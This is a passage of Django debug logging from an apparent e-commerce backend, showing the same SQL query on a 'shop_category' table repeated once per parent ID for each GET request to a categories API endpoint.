(0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 09:59:11,583 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 09:59:11,585 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 09:59:11,587 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 09:59:11,590 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 09:59:11,592 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 09:59:11] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-19 09:59:52,162 utils 4252 140031482124032 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 09:59:52,169 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 09:59:52,173 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 09:59:52,175 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 09:59:52,178 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 09:59:52,181 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 09:59:52,183 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 09:59:52,186 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 09:59:52,188 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 09:59:52,191 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 09:59:52,194 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 09:59:52,196 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 09:59:52,199 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 09:59:52,201 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 09:59:52,205 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 09:59:52,207 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 09:59:52,209 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 09:59:52,212 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 09:59:52,214 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 09:59:52,218 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 09:59:52,220 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 09:59:52,222 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 09:59:52,224 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 09:59:52,227 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 09:59:52,229 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 09:59:52,233 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 09:59:52,235 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 09:59:52,237 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 09:59:52,239 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 09:59:52,242 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 09:59:52,246 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 09:59:52,248 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 09:59:52,250 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 09:59:52,253 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 09:59:52,256 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 09:59:52,260 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 09:59:52,262 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 09:59:52,265 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 09:59:52,267 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 09:59:52,269 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 09:59:52,271 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 09:59:52,274 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 09:59:52,276 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 09:59:52,279 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 09:59:52,281 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 09:59:52,284 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 09:59:52] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-19 10:02:12,705 utils 4252 140031482124032 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 10:02:12,716 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 10:02:12,722 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 10:02:12,726 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 10:02:12,732 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 10:02:12,735 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 10:02:12,739 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 10:02:12,743 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 10:02:12,747 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 10:02:12,753 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 10:02:12,757 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 10:02:12,761 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 10:02:12,764 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 10:02:12,768 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 10:02:12,773 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 10:02:12,776 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", 